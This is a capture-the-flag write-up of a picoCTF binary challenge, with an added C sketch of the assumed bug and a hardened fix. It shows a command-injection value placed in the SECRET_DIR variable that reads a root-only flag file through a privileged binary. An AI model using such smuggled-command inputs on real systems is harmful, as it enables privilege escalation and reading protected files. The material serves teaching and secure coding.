200 points
Category: Binary Exploitation
Tags : #environment #injection
We've got a binary that can list directories as root, try it out !!
ssh to saturn.picoctf.net:<port>, and run the binary named bin once connected. Login as ctf-player with the supplied password.
Running bin on the remote challenge instance yields:
ctf-player@pico-chall$ ./bin
Error: SECRET_DIR environment variable is not set
Setting the SECRET_DIR environment variable on command execution, we get:
ctf-player@pico-chall$ SECRET_DIR=. ./bin
Listing the content of . as root:
bin
OK, so let's get the directory listing of /root:
ctf-player@pico-chall$ SECRET_DIR=/root ./bin
Listing the content of /root as root:
flag.txt
We've found our flag, but permissions don't allow us to read the flag file's contents:
ctf-player@pico-chall$ cat /root/flag.txt
cat: /root/flag.txt: Permission denied
Let's try injecting a command into the SECRET_DIR environment variable (the actual flag value has been redacted for the purposes of this write-up):
ctf-player@pico-chall$ SECRET_DIR="/root&cat /root/flag.txt" ./bin
Listing the content of /root&cat /root/flag.txt as root:
picoCTF{...........redacted.............}flag.txt
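
Why the injection works and how to close it, as an added example that is not part of the original write-up and not the challenge's actual source (which this page does not show). It assumes bin pastes SECRET_DIR into a shell command line; build_shell_cmd and list_dir_safe are hypothetical names, the second being a shell-free replacement.

```c
/* Added example: assumed shape of the bug and a shell-free replacement. */
#include <dirent.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed vulnerable pattern: the directory name is pasted into a shell
 * command line, so metacharacters such as '&' or ';' are interpreted by sh.
 * Returns 0 and fills `out` with the string system() would receive. */
int build_shell_cmd(const char *dir, char *out, size_t outlen)
{
    int n = snprintf(out, outlen, "ls %s", dir);
    return (n < 0 || (size_t)n >= outlen) ? -1 : 0;
}

/* Hardened form: no shell involved. The value is only ever a path argument
 * to opendir(), so "/root&cat ..." is just a directory name that does not
 * exist. Returns the number of entries listed, or -1 on error. */
int list_dir_safe(const char *dir, FILE *to)
{
    DIR *d = opendir(dir);
    if (d == NULL)
        return -1;
    int count = 0;
    struct dirent *e;
    while ((e = readdir(d)) != NULL) {
        if (strcmp(e->d_name, ".") == 0 || strcmp(e->d_name, "..") == 0)
            continue;
        fprintf(to, "%s\n", e->d_name);
        count++;
    }
    closedir(d);
    return count;
}

int main(void)
{
    const char *dir = getenv("SECRET_DIR");
    if (dir == NULL) {
        fprintf(stderr, "Error: SECRET_DIR environment variable is not set\n");
        return 1;
    }
    printf("Listing the content of %s as root:\n", dir);
    return list_dir_safe(dir, stdout) < 0 ? 1 : 0;
}
```

The hardened version removes the command injection only; a privileged binary that lists any directory the caller names still discloses file names, so which paths it accepts is a separate design decision.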